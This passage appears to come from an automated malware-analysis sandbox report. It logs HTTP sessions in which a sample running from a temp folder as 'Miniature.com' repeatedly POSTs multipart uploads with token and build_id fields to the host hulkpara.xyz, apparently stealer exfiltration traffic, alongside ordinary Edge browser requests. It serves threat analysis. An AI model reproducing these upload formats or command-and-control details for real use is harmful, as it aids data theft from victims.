                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          26192.168.2.74981694.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 393697
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------VKNG4E3OZMOZUAAASJ5PCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:02 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          27192.168.2.74980923.49.251.84431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: assets.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC1002INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                          ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                                          Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:02 GMT
                                                                                                                                                                                                                                                                                          Content-Length: 354
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          Akamai-Request-BC: [a=23.218.242.13,b=505835522,c=g,n=US_NJ_EDISON,o=20940]
                                                                                                                                                                                                                                                                                          Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                          Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                          Akamai-Server-IP: 23.218.242.13
                                                                                                                                                                                                                                                                                          Akamai-Request-ID: 1e267002
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Akamai-GRN: 0.0df2da17.1734592442.1e267002
                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          28192.168.2.74982594.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HLX47Y5P8Q9ZM79HVAIW
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4c 58 34 37 59 35 50 38 51 39 5a 4d 37 39 48 56 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 58 34 37 59 35 50 38 51 39 5a 4d 37 39 48 56 41 49 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 58 34 37 59 35 50 38 51 39 5a 4d 37 39 48 56 41 49 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------HLX47Y5P8Q9ZM79HVAIWContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------HLX47Y5P8Q9ZM79HVAIWContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------HLX47Y5P8Q9ZM79HVAIWCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
